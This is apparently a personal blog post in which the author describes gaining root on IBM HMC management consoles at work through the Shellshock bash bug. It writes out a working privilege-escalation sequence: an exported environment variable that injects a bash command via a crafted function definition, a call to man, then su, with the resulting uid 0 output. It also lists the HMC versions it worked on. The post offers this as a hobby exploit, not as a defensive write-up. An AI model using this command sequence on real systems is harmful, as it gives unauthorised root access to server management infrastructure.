IBM HMC Shellshock Hacked

Where I work we have 4 IBM HMC consoles to manage 3x “P5 System IBM” and 2x “770 ISeries”, I have some time trying to get root access on this consoles (because i can), some time ago I achieve that goal using this method Escaping HMC Restricted Shell and now I did it using the bashbug (or shellshock).

You only have to do a ssh login with hscroot (or your user) and here is the magic:

hscroot@HCM03:~> x='() { :;}; /bin/bash’; export x; man
hscroot@HCM03:~> /bin/su –
Password: (hscroot password)
HCM03:~ # id
uid=0(root) gid=0(root) groups=0(root)

This work for my on this versions:

hscroot@HCM03:~> lshmc -V
“version= Version: 7
Release: 7.6.0
Service Pack: 3
HMC Build level 20130610.1


hmcdr:~ # lshmc -V
“version= Version: 7
Release: 3.4.0
Service Pack: 3
HMC Build level 20090709.1
MH01211: Fix for Backup/Restore CCD (03-02-2010)
MH01207: Fix for multi-volume updates using ISO files not burned as images. (12-07-2009)

This url has information about the patch and releases to hmc software

Here is the screencast: